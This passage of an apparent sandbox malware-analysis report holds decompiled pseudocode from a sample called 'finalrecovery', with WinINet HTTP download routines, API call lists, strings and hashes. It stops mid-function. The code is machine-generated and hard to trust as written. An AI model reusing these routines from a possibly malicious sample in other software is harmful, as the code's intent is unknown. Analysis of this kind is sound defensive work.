				_t1 = SetUnhandledExceptionFilter(E0040F715); // executed
				return _t1;
			}

0x0040f70e
0x0040f714

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_0000F715,0040F2A7), ref: 0040F70E

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 53d5a235af531a52490dd842bfc12a63c249480cfd86157dc8376718d19102a6
Instruction ID: 69962aa2a0bbba620ae75cc6f62b3e853447d4c9231e8d547e0787e9311e091a
Opcode Fuzzy Hash: 53d5a235af531a52490dd842bfc12a63c249480cfd86157dc8376718d19102a6
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 100014C9 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 184
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E100014C9(void* __ebx, void* __ecx, void* __edx, void* __edi, signed int __esi, void* __eflags) {
				void* _t78;
				int _t83;
				void* _t85;
				signed int _t90;
				signed int _t93;
				void _t101;
				void* _t112;
				intOrPtr _t114;
				void* _t116;
				void* _t117;
				void* _t118;
				signed int _t119;
				signed int _t120;
				void* _t121;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t125;

				_t119 = __esi;
				_t112 = __edx;
				_push(0x48);
				E1000E879(0x1000fbfb, __ebx, __edi, __esi);
				 *(_t124 - 0x50) = __ecx;
				 *(_t124 - 0x4c) =  *(_t124 + 8);
				E1000178B(_t124 - 0x30,  *(_t124 + 8));
				 *((intOrPtr*)(_t124 - 4)) = 0;
				_t114 =  *((intOrPtr*)(_t124 - 0x20));
				_t101 =  >=  ?  *((void*)(_t124 - 0x30)) : _t124 - 0x30;
				 *(_t124 - 0x18) = _t101;
				if(_t114 < 7) {
					L8:
					_t59 =  *((intOrPtr*)(_t124 - 0x20));
					_t116 =  >=  ?  *((void*)(_t124 - 0x30)) : _t124 - 0x30;
					if( *((intOrPtr*)(_t124 - 0x20)) == 0) {
						L11:
						_t120 = _t119 | 0xffffffff;
						__eflags = _t120;
						L12:
						 *((intOrPtr*)(_t124 - 0x48)) = 0;
						_t103 =  <  ?  *((void*)(_t124 - 0x20)) : _t120;
						_t61 =  >=  ?  *((void*)(_t124 - 0x30)) : _t124 - 0x30;
						 *((intOrPtr*)(_t124 - 0x38)) = 0;
						 *((intOrPtr*)(_t124 - 0x34)) = 0xf;
						 *((char*)(_t124 - 0x48)) = 0;
						E1000183D(_t124 - 0x48,  >=  ?  *((void*)(_t124 - 0x30)) : _t124 - 0x30,  <  ?  *((void*)(_t124 - 0x20)) : _t120);
						_push(_t120);
						 *((char*)(_t124 - 4)) = 1;
						E1000173B(0, _t124 - 0x30, _t116, 0);
						_t117 =  *(_t124 - 0x50);
						E100058C9(_t117 + 0x44, 0x104,  *(_t124 - 0x4c), 0x103);
						asm("sbb eax, eax");
						_t121 = InternetOpenA( *(_t117 + 0xc),  ~( *(_t117 + 0x38)) & 0x00000003,  *(_t117 + 0x38), 0, 0);
						 *(_t124 - 0x54) = _t121;
						if(_t121 == 0) {
							_t122 = 0;
							__eflags = 0;
						} else {
							 *(_t124 - 0x18) = 1;
							InternetSetOptionA(_t121, 0x41, _t124 - 0x18, 4);
							_t77 =  >=  ?  *((void*)(_t124 - 0x48)) : _t124 - 0x48;
							_t78 = InternetConnectA(_t121,  >=  ?  *((void*)(_t124 - 0x48)) : _t124 - 0x48, 0x50,  *(_t117 + 0x3c),  *(_t117 + 0x40), 3, 0, 1);
							 *(_t124 - 0x4c) = _t78;
							if(_t78 == 0) {
								_t122 = 0;
								__eflags = 0;
							} else {
								_t109 =  >=  ?  *((void*)(_t124 - 0x30)) : _t124 - 0x30;
								_t117 = HttpOpenRequestA(_t78, "GET",  >=  ?  *((void*)(_t124 - 0x30)) : _t124 - 0x30, 0, 0, 0, 0x80400000, 1);
								_t140 = _t117;
								if(_t117 == 0) {
									_t122 = 0;
									__eflags = 0;
								} else {
									_push(_t117);
									E100010F0(0, _t117, _t121, _t140);
									_t83 = HttpSendRequestA(_t117, 0, 0, 0, 0);
									_t141 = _t83;
									if(_t83 == 0) {
										_t122 = 0;
										__eflags = 0;
									} else {
										_push(_t117); // executed
										_t85 = E100011B7(0,  *(_t124 - 0x50), _t112, _t117, _t121, _t141); // executed
										_t122 = _t85;
									}
									InternetCloseHandle(_t117);
								}
								InternetCloseHandle( *(_t124 - 0x4c));
							}
							InternetCloseHandle( *(_t124 - 0x54));
						}
						E10001B3F(_t124 - 0x48);
						E10001B3F(_t124 - 0x30);
						return E1000E837(0 | _t122 > 0x00000000, _t117, _t122);
					}
					_t119 = E1000FAC0(_t116, 0x2f, _t59);
					_t125 = _t125 + 0xc;
					if(_t119 == 0) {
						goto L11;
					}
					_t120 = _t119 - _t116;
					goto L12;
				}
				_t118 = _t114 + _t101;
				_push(_t118 - 6 - _t101);
				_push(0x68);
				_push(_t101);
				while(1) {
					_t119 = E1000FAC0();
					_t125 = _t125 + 0xc;
					if(_t119 == 0) {
						break;
					}
					_t90 = E1000EB30(_t119, "http://", 7);
					_t125 = _t125 + 0xc;
					__eflags = _t90;
					if(_t90 == 0) {
						_t119 = _t119 -  *(_t124 - 0x18);
						__eflags = _t119 - 0xffffffff;
						if(_t119 != 0xffffffff) {
							_push(7);
							E1000173B(0, _t124 - 0x30, _t118, _t119);
						}
						goto L8;
					}
					_t123 = _t119 + 1;
					_t93 = _t118 - 6 - _t123;
					__eflags = _t93;
					_push(_t93);
					_push(0x68);
					_push(_t123);
				}
				goto L8;
			}

0x100014c9
0x100014c9
0x100014c9
0x100014d0
0x100014d5
0x100014df
0x100014e2
0x100014ec
0x100014f3
0x100014f6
0x100014fa
0x10001500
0x10001550
0x10001557
0x1000155a
0x10001560
0x10001578
0x10001578
0x10001578
0x1000157b
0x10001583
0x10001586
0x1000158f
0x10001597
0x1000159a
0x100015a1
0x100015a4
0x100015a9
0x100015ae
0x100015b2
0x100015b7
0x100015cb
0x100015db
0x100015ea
0x100015ec
0x100015f1
0x100016a3
0x100016a3
0x100015f7
0x100015fc
0x10001607
0x10001616
0x10001627
0x1000162d
0x10001632
0x10001696
0x10001696
0x10001634
0x1000163d
0x10001656
0x10001658
0x1000165a
0x10001689
0x10001689
0x1000165c
0x1000165c
0x1000165d
0x10001667
0x1000166d
0x1000166f
0x1000167e
0x1000167e
0x10001671
0x10001674
0x10001675
0x1000167a
0x1000167a
0x10001681
0x10001681
0x1000168e
0x1000168e
0x1000169b
0x1000169b
0x100016af
0x100016b7
0x100016c3
0x100016c3
0x1000156b
0x1000156d
0x10001572
0x00000000
0x00000000
0x10001574
0x00000000
0x10001574
0x10001502
0x10001509
0x1000150a
0x1000150c
0x1000152d
0x10001532
0x10001534
0x10001539
0x00000000
0x00000000
0x10001517
0x1000151c
0x1000151f
0x10001521
0x1000153d
0x10001540
0x10001543
0x10001545
0x1000154b
0x1000154b
0x00000000
0x10001543
0x10001523
0x10001527
0x10001527
0x10001529
0x1000152a
0x1000152c
0x1000152c
0x00000000

APIs

__EH_prolog3_GS.LIBCMT ref: 100014D0
__cftof.LIBCMT ref: 100015CB
InternetOpenA.WININET(?,?,?,00000000,00000000), ref: 100015E4
InternetSetOptionA.WININET(00000000,00000041,?,00000004), ref: 10001607
InternetConnectA.WININET(00000000,?,00000050,?,?,00000003,00000000,00000001), ref: 10001627
HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,80400000,00000001), ref: 10001650
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 10001667
InternetCloseHandle.WININET(00000000), ref: 10001681
InternetCloseHandle.WININET(?), ref: 1000168E
InternetCloseHandle.WININET(?), ref: 1000169B

Strings

http://, xrefs: 10001511
GET, xrefs: 1000164A

Memory Dump Source

Source File: 00000002.00000002.324049743.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.324045427.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324060416.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324067694.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_finalrecovery.jbxd

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectH_prolog3_OptionSend__cftof
String ID: GET$http://
API String ID: 1233269984-1632879366
Opcode ID: 3dde38a5e43af9933a4d5a4eb37ae33a92ba4a7e234d1cfae4c7b836071ae69b
Instruction ID: d670101dcd55573e38ebd2397ea5f0eb66eb4d5b9e29d99e64f28dba7a89ef29
Opcode Fuzzy Hash: 3dde38a5e43af9933a4d5a4eb37ae33a92ba4a7e234d1cfae4c7b836071ae69b
Instruction Fuzzy Hash: A6517C71E00229EFEB10CBA4DC85EEEBBB8EF04780F154118F906B7195DB75AA45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0040EDE0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E0040EDE0(_Unknown_base(*)()* __edi, void* __esi) {
				struct HINSTANCE__* _t2;
				void* _t4;
				void* _t7;
				void* _t10;
				struct HINSTANCE__* _t14;

				_t11 = __edi;
				_push(__edi);
				InitializeCriticalSectionAndSpinCount(0x4504fc, 0xfa0);
				_t2 = GetModuleHandleW(L"api-ms-win-core-synch-l1-2-0.dll"); // executed
				_t14 = _t2;
				if(_t14 != 0) {
					L2:
					_t11 = GetProcAddress(_t14, "SleepConditionVariableCS");
					_t4 = GetProcAddress(_t14, "WakeAllConditionVariable");
					if(_t11 == 0 || _t4 == 0) {
						_t4 = CreateEventW(0, 1, 0, 0);
						 *0x4504f8 = _t4;
						if(_t4 != 0) {
							goto L5;
						} else {
							goto L7;
						}
					} else {
						 *0x450514 = _t11;
						 *0x450518 = _t4;
						L5:
						return _t4;
					}
				} else {
					_t14 = GetModuleHandleW(L"kernel32.dll");
					if(_t14 == 0) {
						L7:
						E0040F575(_t10, _t11, _t14, 7);
						asm("int3");
						DeleteCriticalSection(0x4504fc);
						_t7 =  *0x4504f8; // 0x0
						if(_t7 != 0) {
							return CloseHandle(_t7);
						}
						return _t7;
					} else {
						goto L2;
					}
				}
			}

0x0040ede0
0x0040ede1
0x0040edec
0x0040edf7
0x0040edfd
0x0040ee01
0x0040ee14
0x0040ee26
0x0040ee28
0x0040ee30
0x0040ee4b
0x0040ee51
0x0040ee58
0x00000000
0x00000000
0x00000000
0x00000000
0x0040ee36
0x0040ee36
0x0040ee3c
0x0040ee41
0x0040ee43
0x0040ee43
0x0040ee03
0x0040ee0e
0x0040ee12
0x0040ee5a
0x0040ee5c
0x0040ee61
0x0040ee67
0x0040ee6d
0x0040ee74
0x00000000
0x0040ee77
0x0040ee7d
0x00000000
0x00000000
0x00000000
0x0040ee12

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(004504FC,00000FA0,?,?,0040EDBE), ref: 0040EDEC
GetModuleHandleW.KERNELBASE(api-ms-win-core-synch-l1-2-0.dll,?,?,0040EDBE), ref: 0040EDF7
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,0040EDBE), ref: 0040EE08
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0040EE1A
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0040EE28
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0040EDBE), ref: 0040EE4B
DeleteCriticalSection.KERNEL32(004504FC,00000007,?,?,0040EDBE), ref: 0040EE67
CloseHandle.KERNEL32(00000000,?,?,0040EDBE), ref: 0040EE77

Strings

api-ms-win-core-synch-l1-2-0.dll, xrefs: 0040EDF2
SleepConditionVariableCS, xrefs: 0040EE14
kernel32.dll, xrefs: 0040EE03
WakeAllConditionVariable, xrefs: 0040EE20

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2565136772-3242537097
Opcode ID: 929696b3eb6ad812b6eafa8ae96832d20b57949e2c0496d369b19a4a45dc2b4b
Instruction ID: b12daeab647f6f3e0be53642f3fc9edbf6107bf06a2d582c31c99cf387c040d7
Opcode Fuzzy Hash: 929696b3eb6ad812b6eafa8ae96832d20b57949e2c0496d369b19a4a45dc2b4b
Instruction Fuzzy Hash: 17019275B40325ABD7311B72EC09F3736A8AB41B027940936FD00E23D1DA78CC6186AD

Uniqueness

Uniqueness Score: -1.00%

Function 00401A00 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 103
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E00401A00(void* __ebx, void* __edi, void* __eflags, void* _a4) {
				char* _v8;
				char* _v12;
				char* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void* _v40;
				char* _v48;
				char _v56;
				void _v60;
				intOrPtr _v64;
				char* _v68;
				char* _v84;
				intOrPtr _v88;
				signed int _v92;
				void* _v96;
				void* _v124;
				char _v144;
				signed int _v152;
				void _v292;
				int _v296;
				long _v300;
				char* _v304;
				char _v320;
				signed int _v324;
				signed int _v328;
				short* _v332;
				char* _v336;
				signed int _v340;
				char* _v344;
				char* _v360;
				signed int _v364;
				char* _v368;
				char* _v384;
				void* _v456;
				intOrPtr* _v616;
				char _v636;
				signed int _v644;
				intOrPtr _v648;
				char* _v652;
				char* _v668;
				intOrPtr _v672;
				char* _v700;
				void* __esi;
				void* __ebp;
				signed int _t243;
				signed int _t244;
				int _t261;
				char* _t263;
				signed int _t268;
				signed int _t269;
				signed int _t276;
				char _t277;
				signed int _t282;
				signed int _t288;
				signed int _t289;
				short* _t296;
				signed int _t299;
				intOrPtr* _t302;
				signed int _t303;
				signed int _t305;
				short* _t309;
				signed int _t312;
				signed int _t314;
				signed int _t319;
				char* _t324;
				signed int _t331;
				signed int _t333;
				void* _t339;
				intOrPtr _t352;
				signed int _t357;
				char* _t358;
				void* _t366;
				signed int _t371;
				void* _t376;
				char* _t379;
				signed int _t387;
				signed int _t389;
				void* _t390;
				void* _t391;
				void* _t393;
				char* _t394;
				signed int _t395;
				void* _t397;
				intOrPtr _t398;
				void* _t400;
				void* _t401;
				char* _t410;
				intOrPtr* _t418;
				int _t422;
				short* _t429;
				void* _t436;
				char* _t438;
				char* _t441;
				intOrPtr* _t442;
				char _t456;
				char* _t458;
				char* _t465;
				signed int _t468;
				void* _t470;
				short* _t473;
				signed int _t476;
				char _t480;
				intOrPtr* _t482;
				intOrPtr _t484;
				signed int _t485;
				void* _t486;
				void* _t489;
				void* _t491;
				void* _t492;
				void* _t493;
				void* _t494;
				int _t495;
				short* _t496;
				signed int _t498;
				signed int _t500;
				signed int _t501;
				signed int _t502;
				void* _t504;
				intOrPtr* _t505;
				signed int _t506;
				void* _t509;
				char* _t510;
				void* _t511;
				void* _t512;
				void* _t513;
				void* _t514;
				intOrPtr _t515;
				void* _t517;
				void* _t518;
				signed int _t521;
				signed int _t522;
				signed int _t523;
				void* _t525;
				signed int _t526;
				void* _t528;
				void* _t529;
				void* _t530;
				signed int _t531;
				void* _t532;
				void* _t534;
				void* _t535;

				_t388 = __ebx;
				_push(0xffffffff);
				_push(0x42c1fd);
				_push( *[fs:0x0]);
				_t526 = _t525 - 0x24;
				_t243 =  *0x43d054; // 0x8e1b5714
				_t244 = _t243 ^ _t521;
				_v24 = _t244;
				_push(__edi);
				_push(_t244);
				 *[fs:0x0] =  &_v16;
				_t491 = _a4;
				_v48 = 0;
				_v32 = 0;
				_v28 = 0xf;
				_v48 = 0;
				E004026C0(__ebx,  &_v48, "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1", 0x7d);
				_v8 = 0;
				_t248 =  >=  ? _v48 :  &_v48;
				HttpAddRequestHeadersA(_t491,  >=  ? _v48 :  &_v48, _v32, 0x20000000);
				E004026C0(__ebx,  &_v48, "Accept-Language: ru-RU,ru;q=0.9,en;q=0.8", 0x28);
				_t252 =  >=  ? _v48 :  &_v48;
				HttpAddRequestHeadersA(_t491,  >=  ? _v48 :  &_v48, _v32, 0x20000000);
				E004026C0(__ebx,  &_v48, "Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1", 0x32);
				_t256 =  >=  ? _v48 :  &_v48;
				HttpAddRequestHeadersA(_t491,  >=  ? _v48 :  &_v48, _v32, 0x20000000);
				E004026C0(__ebx,  &_v48, "Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0", 0x37);
				_t260 =  >=  ? _v48 :  &_v48;
				_t261 = HttpAddRequestHeadersA(_t491,  >=  ? _v48 :  &_v48, _v32, 0x20000000);
				_t468 = _v28;
				if(_t468 < 0x10) {
					L4:
					 *[fs:0x0] = _v16;
					_pop(_t492);
					_pop(_t509);
					return E0040EB3F(_t261, _t388, _v24 ^ _t521, _t468, _t492, _t509);
				} else {
					_t410 = _v48;
					_t468 = _t468 + 1;
					_t263 = _t410;
					if(_t468 < 0x1000) {
						L3:
						_push(_t468);
						_t261 = E0040ED7F(_t410);
						goto L4;
					} else {
						_t410 =  *(_t410 - 4);
						_t468 = _t468 + 0x23;
						if(_t263 - _t410 + 0xfffffffc > 0x1f) {
							E004134A7(__ebx, _t468, __eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t521);
							_t522 = _t526;
							_push(0xffffffff);
							_push(0x42c24b);
							_push( *[fs:0x0]);
							_t528 = _t526 - 0x170;
							_t268 =  *0x43d054; // 0x8e1b5714
							_t269 = _t268 ^ _t522;
							_v152 = _t269;
							_push(__ebx);
							_push(HttpAddRequestHeadersA);
							_push(_t491);
							_push(_t269);
							 *[fs:0x0] =  &_v144;
							_t510 = _t410;
							__eflags = _t510[0x28];
							_t493 = _v124;
							_v456 = _t493;
							if(__eflags != 0) {
								_v336 = _t510[0x34];
							} else {
								_t510[0x30] = 0x7800;
								_t387 = E0040ED8D(__ebx, _t493, _t510, __eflags, 0x7800);
								_t528 = _t528 + 4;
								_t510[0x28] = _t387;
								_t510[0x34] = 0;
								_v336 = 0;
							}
							_v300 = 0;
							InternetSetFilePointer(_t493, 0, 0, 0, 0);
							while(1) {
								_t276 = InternetReadFile(_t493,  &(_t510[0x34][_t510[0x28]]), 0x3e8,  &_v300); // executed
								_t469 = _v300;
								_t389 = _t276;
								_t277 = _t510[0x30];
								_t510[0x34] =  &(_t510[0x34][_t469]);
								__eflags = _t277 - _t510[0x34] - 0x3e8;
								if(__eflags <= 0) {
									_t510[0x30] = _t277 + 0x7800;
									_t506 = E0040ED8D(_t389, _t493, _t510, __eflags, _t277 + 0x7800);
									__eflags =  &(_t510[0x34][1]);
									E00410440(_t506, _t510[0x28],  &(_t510[0x34][1]));
									L0040EB4D(_t510[0x28]);
									_t469 = _v300;
									_t528 = _t528 + 0x14;
									_t510[0x28] = _t506;
									_t493 = _v332;
								}
								__eflags = _t389;
								if(_t389 == 0) {
									break;
								}
								__eflags = _t469;
								if(_t469 != 0) {
									continue;
								}
								break;
							}
							_v300 = 0x103;
							E00410A80(_t493,  &_v292, 0, 0x104);
							_t529 = _t528 + 0xc;
							_t282 = HttpQueryInfoA(_t493, 0x1d,  &_v292,  &_v300, 0);
							__eflags = _t282;
							if(_t282 == 0) {
								L38:
								_t510[0x34][_t510[0x28]] = 0;
								 *[fs:0x0] = _v20;
								_pop(_t494);
								_pop(_t511);
								_pop(_t390);
								__eflags = _v28 ^ _t522;
								return E0040EB3F(_t510[0x34] - _v336, _t390, _v28 ^ _t522, _t469, _t494, _t511);
							} else {
								_v328 = 0;
								_t288 =  &_v320;
								_v324 = 0;
								__imp__CoCreateInstance(_t288, 0, 1, 0x42e2c0,  &_v328);
								__eflags = _t288;
								if(_t288 < 0) {
									goto L38;
								} else {
									__eflags = _v328;
									if(_v328 == 0) {
										goto L38;
									} else {
										_t418 =  &_v292;
										_v360 = 0;
										_v344 = 0;
										_t470 = _t418 + 1;
										_v340 = 0xf;
										_v360 = 0;
										asm("o16 nop [eax+eax]");
										do {
											_t289 =  *_t418;
											_t418 = _t418 + 1;
											__eflags = _t289;
										} while (_t289 != 0);
										E004026C0(_t389,  &_v360,  &_v292, _t418 - _t470);
										_v12 = 0;
										_t391 = MultiByteToWideChar;
										_t422 =  &(_v344[1]);
										__eflags = _v340 - 0x10;
										_t293 =  >=  ? _v360 :  &_v360;
										_v296 = _t422;
										_t495 = MultiByteToWideChar(0, 0,  >=  ? _v360 :  &_v360, _t422, 0, 0);
										_t296 = E0040ED8D(MultiByteToWideChar, _t495, _t510, __eflags,  ~(0 | __eflags > 0x00000000) | _t294 * 0x00000002);
										_t530 = _t529 + 4;
										_v332 = _t296;
										__eflags = _v340 - 0x10;
										_t428 =  >=  ? _v360 :  &_v360;
										_t496 = _t296;
										MultiByteToWideChar(0, 0,  >=  ? _v360 :  &_v360, _v296, _t496, _t495);
										_t429 = _t496;
										_v384 = 0;
										__eflags = 0;
										_v368 = 0;
										_v364 = 7;
										_v384 = 0;
										_t99 =  &(_t429[1]); // 0x2
										_t473 = _t99;
										do {
											_t299 =  *_t429;
											_t429 =  &(_t429[1]);
											__eflags = _t299;
										} while (_t299 != 0);
										E00402560(MultiByteToWideChar,  &_v384, _t496);
										L0040EB4D(_t496);
										_t531 = _t530 + 4;
										_v12 = 1;
										_t302 = _v328;
										__eflags = _v364 - 8;
										_t475 =  >=  ? _v384 :  &_v384;
										_t303 =  *((intOrPtr*)( *_t302 + 0x10))(_t302,  >=  ? _v384 :  &_v384, L"text",  &_v324, _t429 - _t473 >> 1);
										_v12 = 0;
										_t498 = _t303;
										_t476 = _v364;
										__eflags = _t476 - 8;
										if(_t476 < 8) {
											L25:
											_v12 = 0xffffffff;
											_t469 = _v340;
											_v368 = 0;
											_v364 = 7;
											_v384 = 0;
											__eflags = _t469 - 0x10;
											if(_t469 < 0x10) {
												L29:
												__eflags = _t498;
												if(_t498 >= 0) {
													__eflags = _v324;
													if(__eflags != 0) {
														_t393 = (_t510[0x34] - _v336) * 8 - _t510[0x34] - _v336;
														_t309 = E0040ED8D(_t393, _t498, _t510, __eflags, _t393);
														_t532 = _t531 + 4;
														_t436 = _t510[0x34] - _v336;
														_v296 = 0;
														_v304 = 0;
														_t499 =  *_v324;
														_v332 = _t309;
														_t469 = _v324;
														_t394 = _v336;
														_t312 =  *((intOrPtr*)( *_v324 + 0x10))(_v324, 0, _t436,  &(_t394[_t510[0x28]]), _t393, _t309, _t436,  &_v304,  &_v296, 0);
														__eflags = _t312;
														if(_t312 >= 0) {
															_t316 = _v296;
															_t480 = _t510[0x30];
															_t438 =  &(_t394[_v296]);
															__eflags = _t480 - _t438;
															if(__eflags > 0) {
																_t500 = _t510[0x28];
															} else {
																_t510[0x30] =  &(_t438[0x3e8]);
																_t500 = E0040ED8D(_t394, _t499, _t510, __eflags,  &(_t438[0x3e8]));
																E00401770(_t500, _t510[0x30], _t510[0x28], _t394);
																L0040EB4D(_t510[0x28]);
																_t480 = _t510[0x30];
																_t532 = _t532 + 0x10;
																_t316 = _v296;
																_t510[0x28] = _t500;
															}
															_t469 = _t480 - _t394;
															E00401770( &(_t394[_t500]), _t480 - _t394, _v332, _t316);
															_t532 = _t532 + 8;
															_t319 =  &(_t394[_v296]);
															__eflags = _t319;
															_t510[0x34] = _t319;
														}
														L0040EB4D(_v332);
														_t314 = _v324;
														 *((intOrPtr*)( *_t314 + 8))(_t314);
													}
												}
												_t305 = _v328;
												 *((intOrPtr*)( *_t305 + 8))(_t305);
												goto L38;
											} else {
												_t441 = _v360;
												_t469 = _t469 + 1;
												_t324 = _t441;
												__eflags = _t469 - 0x1000;
												if(_t469 < 0x1000) {
													L28:
													_push(_t469);
													E0040ED7F(_t441);
													_t531 = _t531 + 8;
													goto L29;
												} else {
													_t441 =  *(_t441 - 4);
													_t469 = _t469 + 0x23;
													__eflags = _t324 - _t441 + 0xfffffffc - 0x1f;
													if(__eflags > 0) {
														goto L39;
													} else {
														goto L28;
													}
												}
											}
										} else {
											_t465 = _v384;
											_t489 = 2 + _t476 * 2;
											_t379 = _t465;
											__eflags = _t489 - 0x1000;
											if(_t489 < 0x1000) {
												L24:
												_push(_t489);
												E0040ED7F(_t465);
												_t531 = _t531 + 8;
												goto L25;
											} else {
												_t441 =  *(_t465 - 4);
												_t469 = _t489 + 0x23;
												__eflags = _t379 - _t441 + 0xfffffffc - 0x1f;
												if(__eflags > 0) {
													L39:
													E004134A7(_t391, _t469, __eflags);
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													_push(_t522);
													_t523 = _t531;
													_push(0xffffffff);
													_push(0x42c295);
													_push( *[fs:0x0]);
													_t534 = _t531 - 0x48;
													_t331 =  *0x43d054 ^ _t523;
													__eflags = _t331;
													_v644 = _t331;
													_push(_t391);
													_push(_t510);
													_push(_t498);
													_push(_t331);
													 *[fs:0x0] =  &_v636;
													_v700 = _t441;
													_t482 = _v616;
													_t442 = _t482;
													_v668 = 0;
													_v672 = _t482;
													_v652 = 0;
													_v648 = 0xf;
													_t512 = _t442 + 1;
													_v668 = 0;
													do {
														_t333 =  *_t442;
														_t442 = _t442 + 1;
														__eflags = _t333;
													} while (_t333 != 0);
													E004026C0(_t391,  &_v56, _t482, _t442 - _t512);
													_v16 = 0;
													_t395 = _v36;
													__eflags = _t395 - 0x10;
													_t513 = _v40;
													_t483 = _t513;
													_t446 =  >=  ? _v56 :  &_v56;
													_t501 = E004028A0( >=  ? _v56 :  &_v56, _t513,  >=  ? _v56 :  &_v56, "http://", 7);
													_t535 = _t534 + 0xc;
													__eflags = _t501 - 0xffffffff;
													if(_t501 == 0xffffffff) {
														L45:
														__eflags = _v36 - 0x10;
														_t397 =  >=  ? _v56 :  &_v56;
														__eflags = _t513;
														if(_t513 == 0) {
															L48:
															_t502 = _t501 | 0xffffffff;
															__eflags = _t502;
														} else {
															_t501 = E004109D0(_t397, 0x2f, _t513);
															_t535 = _t535 + 0xc;
															__eflags = _t501;
															if(_t501 == 0) {
																goto L48;
															} else {
																_t502 = _t501 - _t397;
															}
														}
														__eflags = _t513 - _t502;
														_v84 = 0;
														_v68 = 0;
														_t448 =  <  ? _t513 : _t502;
														_v64 = 0xf;
														__eflags = _v36 - 0x10;
														_t337 =  >=  ? _v56 :  &_v56;
														_v84 = 0;
														E004026C0(_t397,  &_v84,  >=  ? _v56 :  &_v56,  <  ? _t513 : _t502);
														_v16 = 1;
														_t339 = _v40;
														__eflags = _t339 - _t502;
														_t503 =  <  ? _t339 : _t502;
														__eflags = _v36 - 0x10;
														_t451 =  >=  ? _v56 :  &_v56;
														_t340 = _t339 - ( <  ? _t339 : _t502);
														_v40 = _t339 - ( <  ? _t339 : _t502);
														E00410440( >=  ? _v56 :  &_v56,  &(( >=  ? _v56 :  &_v56)[ <  ? _t339 : _t502]), _t339 - ( <  ? _t339 : _t502) + 1);
														_t398 = _v88;
														_v92 = 0;
														E00413584(_t398 + 0x44, 0x104, _v60, 0x103);
														_t535 = _t535 + 0x1c;
														asm("sbb eax, eax");
														_t513 = InternetOpenA( *(_t398 + 0xc),  ~( *(_t398 + 0x38)) & 0x00000003,  *(_t398 + 0x38), 0, 0);
														_v96 = _t513;
														__eflags = _t513;
														if(_t513 != 0) {
															_v60 = 1;
															InternetSetOptionA(_t513, 0x41,  &_v60, 4);
															__eflags = _v64 - 0x10;
															_t365 =  >=  ? _v84 :  &_v84;
															_t366 = InternetConnectA(_t513,  >=  ? _v84 :  &_v84, 0x50,  *(_t398 + 0x3c),  *(_t398 + 0x40), 3, 0, 1);
															_t505 = InternetCloseHandle;
															_t401 = _t366;
															__eflags = _t401;
															if(_t401 != 0) {
																__eflags = _v36 - 0x10;
																_t460 =  >=  ? _v56 :  &_v56;
																_t517 = HttpOpenRequestA(_t401, "GET",  >=  ? _v56 :  &_v56, 0, 0, 0, 0x80400000, 1);
																__eflags = _t517;
																if(__eflags != 0) {
																	E00401A00(_t401, InternetCloseHandle, __eflags, _t517);
																	_t371 = HttpSendRequestA(_t517, 0, 0, 0, 0);
																	__eflags = _t371;
																	if(_t371 != 0) {
																		_push(_t517);
																		L6();
																		_v92 = _t371;
																	}
																	 *_t505(_t517);
																}
																 *_t505(_t401);
																_t513 = _v96;
															}
															 *_t505(_t513);
														}
														_t484 = _v64;
														__eflags = _v92;
														_t395 = 0 | _v92 > 0x00000000;
														__eflags = _t484 - 0x10;
														if(_t484 < 0x10) {
															L61:
															_t485 = _v36;
															_v68 = 0;
															_v64 = 0xf;
															_v84 = 0;
															__eflags = _t485 - 0x10;
															if(_t485 < 0x10) {
																L65:
																 *[fs:0x0] = _v24;
																_pop(_t504);
																_pop(_t514);
																_pop(_t400);
																__eflags = _v32 ^ _t523;
